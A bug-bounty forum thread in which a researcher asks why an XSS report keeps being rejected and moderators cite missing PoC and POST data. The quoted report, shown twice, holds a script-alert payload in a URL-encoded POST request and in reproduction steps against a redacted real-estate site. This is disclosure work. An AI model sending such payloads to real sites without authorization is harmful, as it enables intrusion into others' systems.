632611
I have tried to submit this several times, but it keeps getting rejected. It is literally the simplest thing to reproduce, and I have included the steps to reproduce it. It would be very helpful to know why it is being rejected. Thanks.
Can't reproduce vulnerability
Re: Can't reproduce vulnerability
You forgot to provide PoC
-
- Posts:2
- Joined:Sun Jun 17, 2018 12:25 am
Re: Can't reproduce vulnerability
I have the same. It would be helpful if we could be given a short reason why it was rejected.
Re: Can't reproduce vulnerability
Our report form have hints and examples, please read
Re: Can't reproduce vulnerability
Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.
Other submissions have been approved, and they were submitted the same way.
Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:
Other submissions have been approved, and they were submitted the same way.
Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:
I look forward to your response. Thanks.-----------------------
Vulnerability Type: XSS
XSS URL: http://www.[REDACTED].com/idx/search-form/
POST Data: (x-www-form-urlencoded )
POST /property-search/sist_ajax/get_locations.asp
searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D
Cookies: N/A
Application: Custom Code
Comment:
STEPS TO REPRODUCE:
In Chrome or Firefox:
1. Go to http://www.[REDACTED].com/idx/search-form/
2. Enter this into the "Quick Search by Address or MLS Number"search field:
<script>alert("OPENBUGBOUNTY")</script>
Press Enter/Return.
Re: Can't reproduce vulnerability
In report 632611 you forgot to provide POST datawillc wrote: ↑Tue Jun 19, 2018 12:04 pmThank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.
Other submissions have been approved, and they were submitted the same way.
Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:
I look forward to your response. Thanks.-----------------------
Vulnerability Type: XSS
XSS URL: http://www.[REDACTED].com/idx/search-form/
POST Data: (x-www-form-urlencoded )
POST /property-search/sist_ajax/get_locations.asp
searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D
Cookies: N/A
Application: Custom Code
Comment:
STEPS TO REPRODUCE:
In Chrome or Firefox:
1. Go to http://www.[REDACTED].com/idx/search-form/
2. Enter this into the "Quick Search by Address or MLS Number"search field:
<script>alert("OPENBUGBOUNTY")</script>
Press Enter/Return.
Who is online
Users browsing this forum: No registered users and 2 guests